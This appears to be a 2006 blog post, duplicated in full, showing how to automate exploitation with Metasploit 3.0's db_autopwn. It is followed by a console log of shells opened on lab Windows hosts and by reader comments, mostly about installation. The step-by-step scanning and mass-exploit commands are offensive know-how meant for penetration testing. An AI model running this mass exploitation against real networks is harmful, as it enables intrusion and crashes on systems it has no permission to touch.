Metasploit 3.0 Automated Exploitation
A recurring theme in my presentations about Metasploit 3.0 is the need for exploit automation. As of tonight, we finally have enough code to give a quick demonstration :-)
Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an object-oriented interface to an arbitrary database service. Database support is enabled by installing RubyGems, ActiveRecord ("gem install activerecord"), and a database-specific driver ("gem install [ postgresql | sqlite3 | mysql | etc ]"). Once these components have been installed, you will need to load the appropriate plugin from the msfconsole interface for the database that you want to use. The completed plugins include db_postgres, db_sqlite3, and db_sqlite2.
For this example, we will use the PostgreSQL database server on a Gentoo Linux system. While the SQLite database support is functional, performance problems will prevent it from being useful for performing large-scale exploit automation.
You will need a recent version of Ruby (1.8.4+ works nicely), a recent version of PostgreSQL, and a Subversion client for downloading the Metasploit source code. Once these are in place, you need to verify that RubyGems is also installed. If the gem command is not in your path, you will need to install RubyGems. On Gentoo, the command emerge rubygems will build and install this package. Once RubyGems is installed, you need to use the gem command to install ActiveRecord and the PostgreSQL driver for Ruby. This can be accomplished with the commands gem install activerecord and gem install postgres. To verify your installation, run the following command, which should produce no output or errors:
$ ruby -e 'require "rubygems"; require_gem "postgres";'
Once the prerequisites are in place, you need to create a PostgreSQL instance. If you already have a PostgreSQL server running, you can skip this step. To create a new database instance, run the following commands:
$ initdb ~/metasploitdb
$ pg_ctl -D ~/metasploitdb start
Finally, you need to grab the latest copy of the Metasploit Framework source from the public Subversion tree:
$ svn checkout http://metasploit.com/svn/framework3/trunk/ framework3
To obtain the latest updates in the future, just change into the framework3 directory and execute svn update.
Change into the framework3 directory and execute ./msfconsole. You may see a few warning messages about broken modules that you can safely ignore, but eventually you should be looking at a msf> prompt. Load the PostgreSQL driver plugin using the following command:
msf > load db_postgres
Once the plugin loads, type the help command and look at the new options listed under the Postgres Database section. Since we do not have an existing database, we want to use the db_create command. If you created the PostgreSQL instance using the commands above, this should result in various NOTICE and ERROR messages as it loads the schema into the default database name (metasploit3). If you are using an existing PostgreSQL instance, you will need to pass the appropriate parameters to the db_create command (see the help output for more information).
Now that the console is connected to a new database instance, a new set of console commands become available. These are listed in the help output under the Database Backend section. To verify that the database connection is valid, execute the db_hosts command. If everything worked, there should be no results and no errors listed. If you receive a error message and a backtrace, use the db_disconnect command and try executing db_create again with different parameters.
The console is connected to the database, the schema is in place, you are now ready to import vulnerability data. The current version of the framework supports Nessus NBE output files, Nmap XML output files, and a wrapper command (db_nmap) that will launch the nmap port scanner and record the results into the attached database.
Before you start loading data, take a quick look at the db_autopwn command. If you run this command without any parameters, it should result in a blob of text like the following:
msf > db_autopwn
[*] Usage: db_autopwn [options]
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-h Display this help text
The db_autopwn command is where the exploitation magic happens. This command will scan through the database tables and create a list of modules that match up to specific vulnerabilities. This matching process can happen in two different ways. The first method involves analyzing the list of vulnerability references for every exploit and matching them up with the references in every imported vulnerability record. This cross-referencing method is fairly accurate and depends on standard identifiers, such as OSVDB, Bugtraq, and CVE to match exploits with their targets. The second method uses the default port associated with each exploit module to locate targets running the same service. While this will work in most cases, it can cause a fair amount of collateral damage and is likely to miss vulnerabile services running on non-default ports.
At this point, you have a few options. You can either import an existing Nessus NBE file using the db_import_nessus_nbe command, import an existing Nmap XML output file using the db_import_nmap_xml command, or use the db_nmap command to populate the database. The benefit of using a Nessus NBE file is that it provides data for the cross-referencing mode (-x) of db_autopwn. The benefit of using Nmap data is that you can quickly attack a large group of systems without having to run a complete vulnerability scan, but you will miss vulnerabilities that are not on the default port of the associated Metasploit module.
Please keep in mind is that the db_autopwn command will treat ALL of the records in the database as potential targets. Future versions of the framework will include the ability to limit the targets to a specific set of the entire database. Until this change occurs, be really careful about what data you feed to the framework. Do NOT import anything into the database that you are not allowed to exploit.
For the first attempt, try using the db_nmap command to identify all Windows 2000 and Windows XP systems on the local network that expose the SMB service.
msf > db_nmap -p 445 [target]
Replace the [target] string with the network block of your local subnet or the IP address of a target system that you want to test. This command will use the Nmap port scanner to find systems with port 445 exposed. Once this command completes, use the db_services command to view the results. If no hosts were found with port 445 open, no results will be displayed by the db_services command.
Assuming that you found at least one system with port 445 open, its time to run the db_autopwn command and see what modules it will launch. Execute the following command from the console prompt:
msf > db_autopwn -p -t
The -t flag tells the command to display all the match results and the -p flag indicates that port-based matching should be used to locate potential targets. This command should show a handful of exploits and one or two auxiliary modules for every system that was found with port 445 open. Don't worry about the auxiliary modules for now, as they are disabled by default and need to be manually enabled. This is your last chance to verify that every host in the target list is valid and that exploiting (or crashing) these systems won't result in your incarceration or lack of employment.
Time for the fun part! Execute the db_autopwn command again, this time adding the -e flag. This will result in every one of those modules being launched against their specified target. The default payload is a generic bind shell, using a randomized port number for each attempt. Wait for this command to complete and then execute the sessions -l command to view the results. If any of those target systems were vulnerable, you should see at least one command shell. To interact with these shells, use the sessions -i [ID]. To detach from a shell, use control+Z, and to kill a shell, use control+C.
Thats it for the basics. To expand the scope of the test, widen the port range for the db_nmap command or import a Nessus NBE file. If the command finishes, but exploits are still running, you can use the jobs command to kill off any stragglers.
The log below is a result of my own testing against a local network full of vulnerable virtual machines.
Enjoy!
-HD
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an object-oriented interface to an arbitrary database service. Database support is enabled by installing RubyGems, ActiveRecord ("gem install activerecord"), and a database-specific driver ("gem install [ postgresql | sqlite3 | mysql | etc ]"). Once these components have been installed, you will need to load the appropriate plugin from the msfconsole interface for the database that you want to use. The completed plugins include db_postgres, db_sqlite3, and db_sqlite2.
For this example, we will use the PostgreSQL database server on a Gentoo Linux system. While the SQLite database support is functional, performance problems will prevent it from being useful for performing large-scale exploit automation.
You will need a recent version of Ruby (1.8.4+ works nicely), a recent version of PostgreSQL, and a Subversion client for downloading the Metasploit source code. Once these are in place, you need to verify that RubyGems is also installed. If the gem command is not in your path, you will need to install RubyGems. On Gentoo, the command emerge rubygems will build and install this package. Once RubyGems is installed, you need to use the gem command to install ActiveRecord and the PostgreSQL driver for Ruby. This can be accomplished with the commands gem install activerecord and gem install postgres. To verify your installation, run the following command, which should produce no output or errors:
$ ruby -e 'require "rubygems"; require_gem "postgres";'
Once the prerequisites are in place, you need to create a PostgreSQL instance. If you already have a PostgreSQL server running, you can skip this step. To create a new database instance, run the following commands:
$ initdb ~/metasploitdb
$ pg_ctl -D ~/metasploitdb start
Finally, you need to grab the latest copy of the Metasploit Framework source from the public Subversion tree:
$ svn checkout http://metasploit.com/svn/framework3/trunk/ framework3
To obtain the latest updates in the future, just change into the framework3 directory and execute svn update.
Change into the framework3 directory and execute ./msfconsole. You may see a few warning messages about broken modules that you can safely ignore, but eventually you should be looking at a msf> prompt. Load the PostgreSQL driver plugin using the following command:
msf > load db_postgres
Once the plugin loads, type the help command and look at the new options listed under the Postgres Database section. Since we do not have an existing database, we want to use the db_create command. If you created the PostgreSQL instance using the commands above, this should result in various NOTICE and ERROR messages as it loads the schema into the default database name (metasploit3). If you are using an existing PostgreSQL instance, you will need to pass the appropriate parameters to the db_create command (see the help output for more information).
Now that the console is connected to a new database instance, a new set of console commands become available. These are listed in the help output under the Database Backend section. To verify that the database connection is valid, execute the db_hosts command. If everything worked, there should be no results and no errors listed. If you receive a error message and a backtrace, use the db_disconnect command and try executing db_create again with different parameters.
The console is connected to the database, the schema is in place, you are now ready to import vulnerability data. The current version of the framework supports Nessus NBE output files, Nmap XML output files, and a wrapper command (db_nmap) that will launch the nmap port scanner and record the results into the attached database.
Before you start loading data, take a quick look at the db_autopwn command. If you run this command without any parameters, it should result in a blob of text like the following:
msf > db_autopwn
[*] Usage: db_autopwn [options]
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-h Display this help text
The db_autopwn command is where the exploitation magic happens. This command will scan through the database tables and create a list of modules that match up to specific vulnerabilities. This matching process can happen in two different ways. The first method involves analyzing the list of vulnerability references for every exploit and matching them up with the references in every imported vulnerability record. This cross-referencing method is fairly accurate and depends on standard identifiers, such as OSVDB, Bugtraq, and CVE to match exploits with their targets. The second method uses the default port associated with each exploit module to locate targets running the same service. While this will work in most cases, it can cause a fair amount of collateral damage and is likely to miss vulnerabile services running on non-default ports.
At this point, you have a few options. You can either import an existing Nessus NBE file using the db_import_nessus_nbe command, import an existing Nmap XML output file using the db_import_nmap_xml command, or use the db_nmap command to populate the database. The benefit of using a Nessus NBE file is that it provides data for the cross-referencing mode (-x) of db_autopwn. The benefit of using Nmap data is that you can quickly attack a large group of systems without having to run a complete vulnerability scan, but you will miss vulnerabilities that are not on the default port of the associated Metasploit module.
Please keep in mind is that the db_autopwn command will treat ALL of the records in the database as potential targets. Future versions of the framework will include the ability to limit the targets to a specific set of the entire database. Until this change occurs, be really careful about what data you feed to the framework. Do NOT import anything into the database that you are not allowed to exploit.
For the first attempt, try using the db_nmap command to identify all Windows 2000 and Windows XP systems on the local network that expose the SMB service.
msf > db_nmap -p 445 [target]
Replace the [target] string with the network block of your local subnet or the IP address of a target system that you want to test. This command will use the Nmap port scanner to find systems with port 445 exposed. Once this command completes, use the db_services command to view the results. If no hosts were found with port 445 open, no results will be displayed by the db_services command.
Assuming that you found at least one system with port 445 open, its time to run the db_autopwn command and see what modules it will launch. Execute the following command from the console prompt:
msf > db_autopwn -p -t
The -t flag tells the command to display all the match results and the -p flag indicates that port-based matching should be used to locate potential targets. This command should show a handful of exploits and one or two auxiliary modules for every system that was found with port 445 open. Don't worry about the auxiliary modules for now, as they are disabled by default and need to be manually enabled. This is your last chance to verify that every host in the target list is valid and that exploiting (or crashing) these systems won't result in your incarceration or lack of employment.
Time for the fun part! Execute the db_autopwn command again, this time adding the -e flag. This will result in every one of those modules being launched against their specified target. The default payload is a generic bind shell, using a randomized port number for each attempt. Wait for this command to complete and then execute the sessions -l command to view the results. If any of those target systems were vulnerable, you should see at least one command shell. To interact with these shells, use the sessions -i [ID]. To detach from a shell, use control+Z, and to kill a shell, use control+C.
Thats it for the basics. To expand the scope of the test, widen the port range for the db_nmap command or import a Nessus NBE file. If the command finishes, but exploits are still running, you can use the jobs command to kill off any stragglers.
The log below is a result of my own testing against a local network full of vulnerable virtual machines.
Enjoy!
-HD
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
posted by hdm at 8:59 PM
60 Comments:
Pure Auto-Pwnage! HD, you got to update your Nmap man..lol
HD, can i have a photo of you to put on my closet? :p
Great job man !!!! just a cuestion .. using an NBE nessus report, the MSF shell hangs when try to conect port 445 on the remote host / using ms_05_039 .. output //>
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.2:445...
[*] Launching exploit/windows/smb/ms05_039_pnp (12/12) against 192.168.1.2:445...
[*] Started bind handler
msf > [*] Connecting to the SMB service...
sugestions ?? txs
The shell isn't hung actually, that output is just from a background exploit module. Hit enter a couple times and you should see a msf > prompt :-)
i see .. my stake, i try crtl+z .. je :-P
thxs for the info .. !!
Hi All,
I am no newbie (RH2, AT&T5 & BSD before that), but for the life of me I cannot figure out how to install the plugin for mysql. Got everything else installed and configed fine. The example is Postgress but when I sub MySQL, I get nothing.
When I do:
ruby -e 'require "rubygems"; require_gem "mysql";'
I get:
/usr/local/lib/ruby/site_ruby/1.8/rubygems.rb:251:in `report_activate_error': Could not find RubyGem mysql (>= 0.0.0) (Gem::LoadError)
I really don't want to bother a genius like H.D. (diversion below) so if anyone can answer, I would appreciate it.
Diversion:
At a SANS seminar hosted by Ed Skodis a couple years ago, I asked him about MetaSploit and he told us (after saying how awesome it was) the following story:
H.D. as a DOD contractor was walking down the hall with a General/Colnel (forget), and they walk by a classroom on C++. On the projector was 50 lines of code, and H.D. glanced in while they walked by. A few feet down the hall, he says to the officer, "Just a moment." He walks back, sticks his head in and says, "You've got a buffer overflow in line 32."
Curt Purdy
Manager(whanabe Engineer) Information Security
purdy@tecman.com alias root@infosysec.net
The current version of 3.0 has no database plugin for MySQL (nor schema), but writing one up should be easy. To resolve the Gem dependency, just run something like:
$ gem install mysql
I will try to hack up a MySQL plugin later tonight, depending on the workload.
-HD
PS. Lots of fun stories from DoD days :-)
im trying to install postgres on linux(slackware) with this command:
"gem install postgres" (after i installed all the ruby components) and i got this error:
" /usr/bin/gem:9: in 'require':no such file to load --rubygems LoadError)
from /usr/bin/gem:9"
someone know what is the problem ?
thanks !
It sounds like your gems install is broken. Try reinstall the rubygems package (assuming slackware has one) or from the source tarball at http://www.rubygems.org/
very nice work, hdm!
keep going!
use jobs ??
Let says i have 3 jobs : 0, 1 ,2.
how to i kill job 2 ??
The command jobs -l will list all jobs by their ID number. To kill a job, type jobs -k [ID].
hi guys,
I have a question. do you guys have this error? I didn't change anything. this is a fresh and default installation of framework3.
msf > db_nmap -sT -P0 localhost
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-10-04 10:06 MYT
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1660 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
111/tcp open rpcbind
113/tcp open auth
1024/tcp open kdm
Nmap finished: 1 IP address (1 host up) scanned in 0.417 seconds
[-] Error while running command db_nmap: No such file or directory - /tmp/.s.PGSQL.5432
regards.
That error occurrs because no Postgres database instance has been started.
I'm sure you don't need any more pats on the back. *pat*. Phenominal work.
I probably had a conversation with you regarding this already, but I'm still interested in your thoughts on the subject...
How concerned are you about 'lowering the bar' required to succesfully hack. The better/more well armed script kiddie is the obvious concern, but I envision a new army of 'security consultants' armed with a new tool to make them appear competent.
I don't have a firm opinion regarding this, but its a subject I've been pondering. Obviously you are comfortable with releasing the tool (and the many thanks for doing so), but do you have concern regarding the moderately gifted fifth grader that doesn't have a sense of porportion or consequences using such tools?
On a side note, I daydreamed a bit today of new movie hacking sequences , spiffy 3d interfaces, of servers moving from a fuzzed appearance to one visually indicating their vulnerabilities, etc...
Perhaps the upside can (and should?) be that your 'average IT person' may be expected to use such tools to mitigate obvious risk, leaving actual security professionals to do more difficult risk-assesments and work that requires analysis.
/ramble
d a
Once network administrators are comfortable with "hacking" their own servers using exploit tools (Metasploit, Impact, Canvas), the security consultants will have to try a little bit harder to justify their rates. My view is that by making exploit technology easy to use and understand, we create a legitimate need for tools that would otherwise be considered harmful. The last thing we need is a law banning exploit development.
i'm getting a strange db_hosts output, after db_create went well. it's the same when i use any of the database backend commands.i can't fiure out what's broken.
here's the output:
msf > db_hosts
[-] Error while running command db_hosts: can't convert String into Integer
Call stack:
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `connect'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `postgresql_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:251:in `connection_without_query_cache='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/query_cache.rb:54:in `connection='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:220:in `retrieve_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:78:in `connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:1046:in `add_limit!'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:1017:in `construct_finder_sql'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:924:in `find_every'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:381:in `find'
./lib/msf/core/db_objects.rb:35:in `find'
/usr/lib/ruby/1.8/thread.rb:135:in `synchronize'
./lib/msf/core/db_objects.rb:34:in `find'
./lib/msf/core/db.rb:114:in `hosts'
./lib/msf/core/db.rb:105:in `each_host'
./lib/msf/ui/console/command_dispatcher/db.rb:45:in `cmd_db_hosts'
./lib/rex/ui/text/dispatcher_shell.rb:229:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/ui/text/shell.rb:118:in `run'
./msfconsole:63
in ./msfconsole
i type:
load db_postgress it will load the plugin but if i type:
db_create i get an error : error while running command db_create: This plugin failed to load: Failed to connect to the database
any idea?
in ./msfconsole
i type:
load db_postgress it will load the plugin but if i type:
db_create i get an error : error while running command db_create: This plugin failed to load: Failed to connect to the database
any idea?
i installed the rubygems (and its go smooth: "successfully built Rubygem") and after this i installed the Activerecord (and again, all go smooth..) and than i run this: "gem install postgres" and i got this error:
"building native extensions. this could take a while...
*** extconf.rb failed ***
...
ERROR:while executing gem... (Runtime error)
error:failed to build gem native extension. "
maybe some1 know what i need to do for this to work ?
thanks !
To build the native ruby extensions, you need a recent version of Posgres and the development headers.
did i need to install the postgres before im running :"gem install postgres" ? (or what), and the development headers of what ? (of postgres ? )
thanks!
I get this following error after entering gem install postgres. I am using PostgreSQL 8.1.5-2
Bulk updating Gem source index for: http://gems.rubyforge.org
Building native extensions. This could take a while...
can't find header files for ruby.
ERROR: While executing gem ... (RuntimeError)
ERROR: Failed to build gem native extension.
HD, I have installed ruby and MSF 3.0. I also installed PostGreSql 8.1.4. The problem is that I am have a FAT32 system and during installation I found out that I would need to manually inialize PostGreSql. I tried to do so but I get an error message saying the server can be initialized with a super user account. I tried creating a new user with createuser it give another error message saying "Could not connect to server:Connection refused <0x0000274D/10061>
Is the server running on host "???" and accepting
TCP/IP connection on port 5432?
I use WinXP.
If you have trouble building the native postgresql driver, you can try the pure-ruby version instead (gem install postgres-pr).
I have no experience with Postgres on the Windows platform, so no good answers spring to mind. If anyone reading has managed to install and use Postgres on a FAT32 XP system, please leave a comment.
HD, U said u were gonna hack up a MySql plugin which should serve as a replacement for the PostGreSql.
Why I am asking is because I have not found and solution to my problem on WinXP. I still have MySql installed so I think that would be a better option 4 me.
hi, i update framework 3.0 via SVN to revision 4.50 and i have an error when i try to start the ide via /msfweb
ArgumentError in Ide#start
Showing app/views/ide/start.rhtml where line #40 raised:
wrong number of arguments (2 for 1)
Extracted source (around line #40):
*cant post the error output-
Your HTML cannot be accepted: PHP, ASP, and other server-side scripting is not allowed.
thks .
:my english sucks SORRY !!
MySQL support will be added eventually, but probably not in the next week. The new msfweb interface is going to be in a state of flux for the next couple weeks, if its completely broken, wait a while, update, and try again :-)
thks HD, i wait a while ... !! Great job !!
hi, I did the install well, launched db_create and finally got an error: couldn't connect to database. The database is there and I can connect well to it with psql.
Is this a script-kiddie protection ?
thanks.
Hi
I am having a problem while loading postgreSQL
gem install postgres command gives an error that ruby header files are missing.I have used yum install for loading ruby on Fedora 5.
I have not found any place for getting these header files also.Please Help
If you're trying to get this working in Debian (sid), these are the packages I installled (I don't know how many are actually needed)
postgresql-dev
libpq-dev
postgres-server-dev-7.4
postgres-7.4
rubygems
libgems-ruby1.8
ruby1.8-dev
When you install rubygems, ruby1.8 is installed along with it, but ruby1.8-dev is not.
I just spent about an hour installing different dev packages trying to figure this out. Finally I turned to Google who, as usual, came through in just a matter of minutes.
What's the trick to making pg_ctl create the /tmp/.s.PGSQL.5432 file?
The database starts with seemingly no errors.
-----------------------------
/usr/lib/postgresql/7.4/bin/pg_ctl -D ~/metasploit/metasploitdb start
LOG: database system was shut down at 2006-11-01 11:18:41 CST
LOG: checkpoint record is at 0/B4F6EC
LOG: redo record is at 0/B4F6EC; undo record is at 0/0; shutdown TRUE
LOG: next transaction ID: 615; next OID: 25478
postmaster successfully started
LOG: database system is ready
-----------------------------
This doesn't, however, create the /tmp/.s.PGSQL.5432 file.
I've got a postmaster process running and the /var/run/postgresql/.s.PGSQL.5432= and /var/run/postgresql/.s.PGSQL.5432.lock files are created successfully.
If I manually touch the /tmp/.s.PGSQL.5432 file db_hosts still bombs with a Connection refused error. I've even tried chmod'ing the /tmp file to 777 and I still get the connection refused error.
Any ideas on what I'm doing wrong?
I'm getting the following error: [-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1540 RProcessStartupPacket
Any ideas?
hi, i´d having some problems installing postgresql...well i use xp and i began with the this commands...
./msfconsole
(correct)
msf >load db_mysql
(I think i read something like if postgresql dont work on xp use that so i did, please tell if its correct in this way)
msf >db_nmap -p 445 192.168.0.0/24
I get an error here i think it has relation with the path or something like that because it says me the following error:
Failed to open XML output file /cygdrive/c/DOCUME~1/administrator/CONFIG~1/Temp/dbnmap.3580
.0 for writing
QUITTING!
thanks
In response to a previous post, mentioning a problem with the /tmp/.s.PGSQL.5432 file, I've seen the problem as well. From what I can tell, if you try to configure metasploit with postgresql under ubuntu, you will undoubtedly arrive at this error. The problem is not that there is no instance of postgresql running, but that the Ubuntu package stores the file at /var/run/postgresql/.s.PGSQL.5432. I haven't researched it further, but I should assume the solution would be to have postgresql store the file in /tmp. I cannot say whether this is a "bug" in postgresql, metasploit, or the ubuntu package. Probably just an oddity of the ubuntu package conflicting with where metasploit is searching for the file... but I could be way off. If anyone has the solution, me and the other guy are searching for answers. :P
Until then, I'll be running backtrack under vmware-player.
I am also getting the following error as bamed said.
Has anyone any idea about that???
msf > db_hosts
[-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1520 RProcessStartupPacket
I already setting up automated exploitation using Metasploit 3-beta with SQLite3 database backend on Cygwin environment.
Check out Automated exploit using Metasploit with SQLite3 and Cygwin.
good stuff in here, what i cannot understand is that why the msf has a lot of exploits for win 2000 and xp sp1, and for sp2 a few, i am dissapointed, if someone know how to create new exploits please email me at ghost_jedi_mind@yahoo.com.thanks
...msf > db_hosts
[-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet ...
Try to use "user:pass@host:port/db to" to command db (create, connect ...)
bye
First of all I'm REALLY starting to hate linux. I love all the packages that are absolutely required for something to work, but they are not included as dependencies. I tried for about 3 facking hours to get posasql or whatever it's called running and never did, only to see someone say just use the ruby version of it. Great. Then, your highly detailed instructions just cease after the database part and you say read help. Wow, I went thru all this BS only to have you fizzle out on me and make me figure out what the hell is going on on my own. Come on people. Seriously, the linux package system sucks, if a program requires the dev package, why the FACK doesn't it install it automatically? You tell us to set up the database, then you say to create it from the mfs command line... Come on man, put the crack pipe down and follow through with your instructions thanks for your hard work and all, but it seems to be pretty damn pointless and a huge waste of my time to go against your own instructions like that. Thanks for telling me how to do only half of this and leaving me hanging, just FACKING perfect. Every single step was a pain in the FACKING ass and did not work without intense research and looking for random crazy packages that obviously you didn't know needed to be installed. I am so facking angry right now I am about to put my fist thru the monitor. Thanks for the god damn headache
If you are looking for a ready-to-pwn version of Metasploit 3 on Linux, try the BackTrack 2.0 Live CD. The package system for Linux varies by distribution and no single installer from us would solve these problems for every Linux user.
Really very sorry man, been up all night, got the flu and my back is out. Seriously like the last 15 things I've tried to get running on my system has given me nothing but greif, and my head just decided to blow up. I appreciate all the work you've done on here and will take a fresh look at it when I am feeling better. Again, sorry for being such a clueless asshole.
Grrrr, I keep getting a
"Error while running command db_autopwn: no such file to load -- sqlite3"
What am I missing?
Grrr, once I get to the autopwn command I get
"Error while running command db_autopwn: no such file to load -- sqlite3"
What am I missing?
Ok...I have got to db_create and the errors appear like you said, but when I run the command db_hosts (or any other command) it returns "can't convert string into integer" with a bunch of garbage following. What could the problem be?
I can't seem to get the postgres gem anywhere, when i try to do gem install postgres i get the error Error fetching remote gem cache. Any other way I can get this gem installed? anyone have the actual .gem file?
>> db_import_nessus_nbe /scan
[*] Could not read the NBE file
msf >
---------------------------------
Hello 2 all. Im having problems inporting a .nbe nesuss file, it reports it as unreadable??.
When i try and use the db_nmap this is what i get...
[*] Successfully loaded plugin: db_sqlite3
>> db_create
[*] Creating a new database instance...
>> db_nmap -135 192.168.1.2
help
[-] Unknown command: >>.
[-] Unknown command: [*].
[-] Unknown command: >>.
[-] Unknown command: [*].
[-] Unknown command: >>.
does anyone know how to solve this problem, or tell me where im going wrong. :(
